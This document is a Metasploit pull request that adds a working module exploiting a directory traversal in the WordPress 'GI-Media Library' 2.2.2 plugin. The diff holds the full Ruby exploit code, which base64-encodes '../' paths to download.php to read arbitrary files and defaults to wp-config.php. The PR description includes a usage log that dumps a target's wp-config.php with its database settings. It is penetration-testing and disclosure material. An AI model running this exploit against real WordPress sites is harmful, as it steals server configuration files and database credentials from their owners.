### PR TITLE
Add WordPress GI-Media Library Plugin File Read.

### DIFF
--- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('FILEPATH', [true, 'The file to read', 'wp-config.php']),
+        OptString.new('FILEPATH', [true, 'The wordpress file to read', 'wp-config.php']),
         OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the wordpress root folder)', 3 ])
       ], self.class)
   end

--- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress GI-Media Library Plugin File Read Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in WordPress Plugin
+        "GI-Media Library" version 2.2.2, allowing to read arbitrary files on
+        Wordpress directory.
+      },
+      'References'     =>
+        [
+          ['WPVDB', '7754'],
+          ['URL', 'http://wordpressa.quantika14.com/repository/index.php?id=24']
+        ],
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability discovery - QuantiKa14?
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, 'The file to read', 'wp-config.php']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the wordpress root folder)', 3 ])
+      ], self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('gi-media-library', '3.0')
+  end
+
+  def run_host(ip)
+    traversal = "../" * datastore['DEPTH']
+    filename = datastore['FILEPATH']
+    filename = filename[1, filename.length] if filename =~ /^\//
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(wordpress_url_plugins, 'gi-media-library', 'download.php'),
+      'vars_get' =>
+        {
+          'fileid' => Rex::Text.encode_base64(traversal + filename)
+        }
+    )
+
+    if res && res.code == 200 && res.body && res.body.length > 0
+
+      print_status('Downloading file...')
+      print_line("\n#{res.body}")
+
+      fname = datastore['FILEPATH']
+
+      path = store_loot(
+        'gimedia-library.file',
+        'text/plain',
+        ip,
+        res.body,
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded. Check the correct path wordpress files.")
+    end
+  end
+end


### PR DESCRIPTION
#### Add Wordpress Plugin GI-Media Library File Read Vulnerability.

  Application: Wordpress Plugin 'GI-Media Library' 2.2.2
  Homepage: https://wordpress.org/plugins/gi-media-library
  Source Code: https://downloads.wordpress.org/plugin/gi-media-library.2.2.2.zip
  References: https://wpvulndb.com/vulnerabilities/7754
#### Vulnerable packages*

  2.2.2
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use auxiliary/scanner/http/wp_gimedia_library_file_read 
msf auxiliary(wp_gimedia_library_file_read) > show options 

Module options (auxiliary/scanner/http/wp_gimedia_library_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      3                yes       Traversal Depth (to reach the wordpress root folder)
   FILEPATH   wp-config.php    yes       The file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(wp_gimedia_library_file_read) > info

       Name: WordPress GI-Media Library Plugin File Read Vulnerability
     Module: auxiliary/scanner/http/wp_gimedia_library_file_read
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Unknown
  Roberto Soares Espreto <robertoespreto@gmail.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      3                yes       Traversal Depth (to reach the wordpress root folder)
  FILEPATH   wp-config.php    yes       The file to read
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability in 
  WordPress Plugin "GI-Media Library" version 2.2.2, allowing to read 
  arbitrary files on Wordpress directory.

References:
  https://wpvulndb.com/vulnerabilities/7754
  http://wordpressa.quantika14.com/repository/index.php?id=24

msf auxiliary(wp_gimedia_library_file_read) > set RHOSTS 192.168.1.31
RHOSTS => 192.168.1.31
msf auxiliary(wp_gimedia_library_file_read) > run

[*] Downloading file...

<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress_db');

/** MySQL database username */
define('DB_USER', 'wordpress');

/** MySQL database password */
define('DB_PASSWORD', 'xxxxxxxxxxxxxxx');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

...snip...

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

[+] 192.168.1.31:80 - File saved in: /home/espreto/.msf4/loot/20150424042652_default_192.168.1.31_gimedialibrary._517535.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wp_gimedia_library_file_read) >

```
